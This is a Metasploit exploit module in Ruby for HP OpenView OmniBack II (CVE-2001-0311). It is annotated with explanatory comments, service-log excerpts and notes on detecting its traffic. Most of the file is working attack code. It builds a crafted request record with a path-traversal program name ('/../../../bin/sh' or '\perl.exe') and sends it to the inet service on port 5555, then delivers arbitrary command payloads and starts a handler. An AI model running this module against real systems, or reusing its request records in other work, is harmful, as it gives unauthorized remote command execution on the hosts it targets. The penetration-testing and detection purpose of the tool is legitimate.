Path: blob/master/modules/exploits/multi/misc/openview_omniback_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# HP OpenView OmniBack II command execution (CVE-2001-0311).
#
# The module speaks to the OmniBack/Data Protector "inet" service on TCP 5555
# (see RPORT below). Each request is a NUL-separated record that names a
# program to run; the Unix target asks for "/../../../bin/sh" and the Windows
# target for "\perl.exe" (the Windows service logs quoted further down show
# the same record type as "request 28"). Commands are delivered either as a
# second write on the same socket (Unix) or embedded in perl's -e argument
# (Windows), which is why only 'cmd' payloads are compatible.
#
# Detection note (from the service logs preserved in #exploit): the inet
# service writes "A request 28 (<parameter>) came from host [...] which is not
# a cell manager of this client" for requests from unexpected hosts, so both
# #check and #exploit leave a log line naming the source host and parameter.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata (name, references, payload constraints, targets)
  # and the single option RPORT, defaulting to the inet service port 5555.
  #
  # @param info [Hash] module info passed through to update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'HP OpenView OmniBack II Command Execution',
        'Description' => %q{
          This module uses a vulnerability in the OpenView Omniback II
          service to execute arbitrary commands. This vulnerability was
          discovered by DiGiT and his code was used as the basis for this
          module.

          For Microsoft Windows targets, due to module limitations, use the
          "unix/cmd/generic" payload and set CMD to your command. You can only
          pass a small amount of characters (4) to the command line on Windows.
        },
        'Author' => [ 'hdm', 'aushack' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2001-0311'],
          ['OSVDB', '6018'],
          ['BID', '11032'],
          ['URL', 'http://www.securiteam.com/exploits/6M00O150KG.html'],
        ],
        # Only 'unix' is declared even though a Windows target exists: the
        # Windows target is driven with a unix/cmd payload (see Description).
        'Platform' => ['unix'], # win
        'Arch' => ARCH_CMD,
        'Privileged' => false,
        'Payload' => {
          'Space' => 1024,
          'DisableNops' => true,
          # The command is written to the socket / into a perl -e argument, so
          # only plain command payloads that work over a raw connection fit.
          'Compat' =>
          {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic perl telnet',
          }
        },
        'Targets' => [
          [ 'Unix', {}],
          [ 'Windows', {}],
        ],
        'DisclosureDate' => '2001-02-28',
        'DefaultTarget' => 0,
        # NOTE(review): #check is not passive -- it runs "echo /etc/*" (Unix)
        # or perl "system(dir)" (Windows) on the target -- so the side-effect
        # classification here is conservative; confirm before tightening it.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(5555)
      ]
    )
  end

  # Active vulnerability check: sends the same request record as #exploit
  # with a harmless listing command and inspects the reply.
  #
  # Unix: the request names /../../../bin/sh and a second write sends
  # "echo /etc/*"; a reply mentioning passwd/group/resolv means the shell
  # ran the command. Windows: the request names \perl.exe with
  # "-e system(dir)"; a reply containing "Volume" is taken as dir output.
  #
  # Note that this method falls off the end (returns nil) if the selected
  # target name matches neither /Unix/ nor /Windows/.
  #
  # @return [Exploit::CheckCode] Vulnerable, Safe, or nil (see above)
  def check
    if (target.name =~ /Unix/)
      connect

      # Request record: NUL-separated fields, with the program path in the
      # field after "28". The exact meaning of the other fields is not
      # documented here and is carried over from the original exploit.
      poof =
        "\x00\x00\x00.2" +
        "\x00 a" +
        "\x00 0" +
        "\x00 0" +
        "\x00 0" +
        "\x00 A" +
        "\x00 28" +
        "\x00/../../../bin/sh" +
        "\x00\x00" +
        "digit " +
        "AAAA\n\x00"

      sock.put(poof)
      # The shell reads its input from the socket; list /etc as a low-impact
      # probe whose output is easy to recognise.
      sock.put("echo /etc/*;\n")
      res = sock.get_once(-1, 5)
      disconnect

      if !(res and res.length > 0)
        vprint_status("The remote service did not reply to our request")
        return Exploit::CheckCode::Safe
      end

      # Any of these names in the reply means the glob was expanded on the
      # target, i.e. the shell actually ran.
      if (res =~ /passwd|group|resolv/)
        vprint_status("The remote service is exploitable")
        return Exploit::CheckCode::Vulnerable
      end

      return Exploit::CheckCode::Safe
    end

    if (target.name =~ /Windows/)
      connect

      # Same record layout as the Unix branch; the program is perl.exe and the
      # command is passed in its -e argument rather than on the socket.
      poof =
        "\x00\x00\x00.2" +
        "\x00 a" +
        "\x00 0" +
        "\x00 0" +
        "\x00 0" +
        "\x00 A" +
        "\x00 28" +
        "\x00\\perl.exe" +
        "\x00\x20-e\x20system(dir)\x00\x00" +
        "digit " +
        "AAAA\n\x00"

      sock.put(poof)
      res = sock.get_once(-1, 5)
      disconnect

      # Printed before the empty-reply test, so a nil reply prints a blank line.
      print_status(res.to_s)

      if !(res and res.length > 0)
        print_status("The remote service did not reply to our request")
        return Exploit::CheckCode::Safe
      end

      # "Volume" with one arbitrary byte between the letters: the original
      # author attributes this to the reply being Unicode (two bytes per
      # character), so a plain /Volume/ would not match.
      if (res =~ /V.o.l.u.m.e/) # Unicode
        print_status("The remote service is exploitable")
        return Exploit::CheckCode::Vulnerable
      end

      return Exploit::CheckCode::Safe
    end
  end

  # Delivers the payload using the same request record as #check.
  #
  # Unix: the request names /../../../bin/sh, then payload.encoded followed
  # by ";\n" is written to the socket for the shell to read. Windows: the
  # encoded payload is interpolated into perl's "-esystem(...)" argument
  # inside the request itself (the Description explains the length limit).
  # In both branches the first reply is printed, then the handler is started
  # and the socket closed. Nothing happens if the target name matches
  # neither /Unix/ nor /Windows/.
  #
  # @return [void]
  def exploit
    if (target.name =~ /Unix/)
      connect

      poof =
        "\x00\x00\x00.2" +
        "\x00 a" +
        "\x00 0" +
        "\x00 0" +
        "\x00 0" +
        "\x00 A" +
        "\x00 28" +
        "\x00/../../../bin/sh" +
        "\x00\x00" +
        "digit " +
        "AAAA\n\x00"

      sock.put(poof)
      # Trailing ";\n" terminates the command line for the spawned shell.
      sock.put(payload.encoded + ";\n")
      res = sock.get_once(-1, 5)

      if !(res and res.length > 0)
        print_status("The remote service did not reply to our request")
        disconnect
        return
      end

      print(res)

      handler
      disconnect
    end

    if (target.name =~ /Windows/)

      # aushack
      #
      # Tested during pen test against Windows 2003 server.
      # Windows Service details:
      # - Data Protector Inet
      #   -> [HP OpenView Storage Data Protector] - Backup client service
      #   -> "C:\Program Files\OmniBack\bin\omniinet.exe"
      #   -> OmniInet service for Windows NT
      #   -> File version: 6.0.0.0
      #
      # This needs to be cleaned up later. Preferably using the Windows/cmd/perl payloads.
      #
      # Notes:
      # I was unable to use directory traversal, OR (||) or AND (&&) techniques to directly run cmd.exe
      # Perhaps a difference in Windows/Unix code? Logs:
      #
      # 11/11/2008 12:18:37 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
      # A request 28 (..\foo.exe) came from host [attacker] which is not a cell manager of this client
      #
      # 11/11/2008 12:18:37 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
      # [RxNtIntegUtil] parameter refused: ..\foo.exe
      #
      # 11/11/2008 12:21:59 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
      # A request 28 (x.exe || cmd /c dir > c:) came from host [attacker] which is not a cell manager of this client
      #
      # 11/11/2008 12:21:59 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
      # [RxNtIntegUtil] parameter refused: x.exe || cmd /c dir > c:
      #
      # 11/11/2008 12:22:40 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
      # A request 28 (perl.exe && cmd /c dir >) came from [attacker] which is not a cell manager of this client
      #
      # 11/11/2008 12:22:40 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
      # [RxNtIntegUtil] parameter refused: perl.exe && cmd /c dir >
      #
      # Reviewer note: the two log lines above are written by the service
      # itself (allow_deny.c / ntinet.c) and name the request type, the
      # parameter and the source host, so the service log is a usable
      # detection source for this module's traffic.

      connect

      # The payload is embedded in the request record as perl's -e argument;
      # there is no second write on this branch (see the commented line below).
      poof =
        "\x00\x00\x00.2" +
        "\x00 a" +
        "\x00 0" +
        "\x00 0" +
        "\x00 0" +
        "\x00 A" +
        "\x00 28" +
        "\x00\\perl.exe" +
        "\x00\x20-esystem(#{payload.encoded})\x00\x00" +
        "digit " +
        "AAAA\n\x00"

      sock.put(poof)
      # sock.put(payload.encoded + "\n")
      res = sock.get_once(-1, 5)

      if !(res and res.length > 0)
        print_status("The remote service did not reply to our request")
        disconnect
        return
      end

      print(res)

      handler
      disconnect
    end
  end
end